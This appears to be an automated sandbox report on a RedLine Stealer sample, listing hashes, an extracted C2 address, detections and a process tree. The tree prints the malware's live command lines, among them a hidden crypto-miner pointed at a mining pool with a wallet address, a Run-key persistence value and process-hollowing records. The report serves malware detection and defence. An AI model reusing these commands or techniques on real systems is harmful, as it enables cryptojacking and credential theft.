Analysis
max time kernel: 123s
max time network: 146s
platform: windows10_x64
resource: win10-en-20211208
submitted: 29-01-2022 16:31

Static task: static1
Behavioral task: behavioral1
Sample: 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
Resource: win10-en-20211208
General
Target: 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
Size: 48KB
MD5: 6cacd4748ecedd5c5242ef62a941ecbb
SHA1: 1abc42914153674634cc58674c8d4314fbe22188
SHA256: 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd
SHA512: a796b796f8b1acb1494e86fda8ac6fcfe6294011cc00b978459e7f3b76006733a4dc6df6b661660413d979d7e72c3f6c0d43e587ec08e718d49a349bc68596ea
Malware Config
Extracted
Family: redline
Botnet: 2142468762
C2: 45.9.20.40:50162
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource  yara_rule
behavioral1/memory/1300-137-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description  pid  process  target process
PID 668 created 1424  668  WerFault.exe  RegHost.exe
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
pid   process
1872  a.exe
64    RegHost.exe
1648  RegHost.exe
832   RegHost.exe
644   RegHost.exe
2516  RegHost.exe
1964  RegHost.exe
1884  RegHost.exe
2392  RegHost.exe
1424  RegHost.exe
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  a.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  a.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  RegHost.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource  yara_rule
C:\Users\Admin\AppData\Local\Temp\a.exe  themida
C:\Users\Admin\AppData\Local\Temp\a.exe  themida
behavioral1/memory/1872-152-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  themida
behavioral1/memory/1872-153-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  themida
behavioral1/memory/1872-154-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/64-161-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/64-162-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/64-163-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/1648-169-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1648-170-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1648-171-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/832-177-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/832-178-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/832-179-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/644-185-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/644-186-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/644-187-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/2516-193-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/2516-194-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/2516-195-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/1964-201-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1964-202-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1964-203-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/1884-209-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1884-210-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1884-211-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/2392-217-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/2392-218-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/2392-219-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe  themida
behavioral1/memory/1424-225-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1424-226-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
behavioral1/memory/1424-227-0x00007FF702120000-0x00007FF702508000-memory.dmp  themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  a.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 10 IoCs
Processes:
description  ioc  process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  a.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
Processes:
pid   process
2956  bfsvc.exe
2956  bfsvc.exe
3936  bfsvc.exe
3936  bfsvc.exe
3104  bfsvc.exe
3104  bfsvc.exe
1288  bfsvc.exe
1288  bfsvc.exe
3480  bfsvc.exe
3480  bfsvc.exe
2264  bfsvc.exe
2264  bfsvc.exe
2540  bfsvc.exe
2540  bfsvc.exe
3704  bfsvc.exe
3704  bfsvc.exe
3536  bfsvc.exe
3536  bfsvc.exe
-
Suspicious use of SetThreadContext 19 IoCs
Processes:
description  pid  process  target process
PID 3484 set thread context of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 1872 set thread context of 2956  1872  a.exe  bfsvc.exe
PID 1872 set thread context of 3280  1872  a.exe  explorer.exe
PID 64 set thread context of 3936  64  RegHost.exe  bfsvc.exe
PID 64 set thread context of 3192  64  RegHost.exe  explorer.exe
PID 1648 set thread context of 3104  1648  RegHost.exe  bfsvc.exe
PID 1648 set thread context of 2580  1648  RegHost.exe  explorer.exe
PID 832 set thread context of 1288  832  RegHost.exe  bfsvc.exe
PID 832 set thread context of 1560  832  RegHost.exe  explorer.exe
PID 644 set thread context of 3480  644  RegHost.exe  bfsvc.exe
PID 644 set thread context of 3484  644  RegHost.exe  explorer.exe
PID 2516 set thread context of 2264  2516  RegHost.exe  bfsvc.exe
PID 2516 set thread context of 980  2516  RegHost.exe  explorer.exe
PID 1964 set thread context of 2540  1964  RegHost.exe  bfsvc.exe
PID 1964 set thread context of 3620  1964  RegHost.exe  explorer.exe
PID 1884 set thread context of 3704  1884  RegHost.exe  bfsvc.exe
PID 1884 set thread context of 3136  1884  RegHost.exe  explorer.exe
PID 2392 set thread context of 3536  2392  RegHost.exe  bfsvc.exe
PID 2392 set thread context of 2908  2392  RegHost.exe  explorer.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid  pid_target  process  target process
668  1424  WerFault.exe  RegHost.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid   process
2620  powershell.exe
2620  powershell.exe
2620  powershell.exe
3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
1300  RegAsm.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3280  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
3192  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
2580  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
1560  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
3484  explorer.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description  pid  process
Token: SeDebugPrivilege  2620  powershell.exe
Token: SeDebugPrivilege  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
Token: SeDebugPrivilege  1300  RegAsm.exe
Token: SeDebugPrivilege  668  WerFault.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process
PID 3484 wrote to memory of 2620  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  powershell.exe
PID 3484 wrote to memory of 2620  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  powershell.exe
PID 3484 wrote to memory of 2620  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  powershell.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 3484 wrote to memory of 1300  3484  04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe  RegAsm.exe
PID 1300 wrote to memory of 1872  1300  RegAsm.exe  a.exe
PID 1300 wrote to memory of 1872  1300  RegAsm.exe  a.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 2956  1872  a.exe  bfsvc.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 1872 wrote to memory of 3280  1872  a.exe  explorer.exe
PID 3280 wrote to memory of 64  3280  explorer.exe  RegHost.exe
PID 3280 wrote to memory of 64  3280  explorer.exe  RegHost.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
PID 64 wrote to memory of 3936  64  RegHost.exe  bfsvc.exe
Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==
  (the base64/UTF-16LE -enc argument decodes to [Threading.Thread]::Sleep(20000), a 20-second sleep)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 3] C:\Users\Admin\AppData\Local\Temp\a.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\a.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

[depth 4] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 4] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

[depth 6] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
  - Suspicious behavior: EnumeratesProcesses

[depth 7] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 8] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 8] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
  - Suspicious behavior: EnumeratesProcesses

[depth 9] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 10] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 10] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
  - Suspicious behavior: EnumeratesProcesses

[depth 11] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 12] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 12] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
  - Suspicious behavior: EnumeratesProcesses

[depth 13] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 14] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 14] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"

[depth 15] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 16] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 16] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"

[depth 17] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 18] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 18] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"

[depth 19] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext

[depth 20] C:\Windows\bfsvc.exe
  cmdline: C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 20] C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"

[depth 21] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
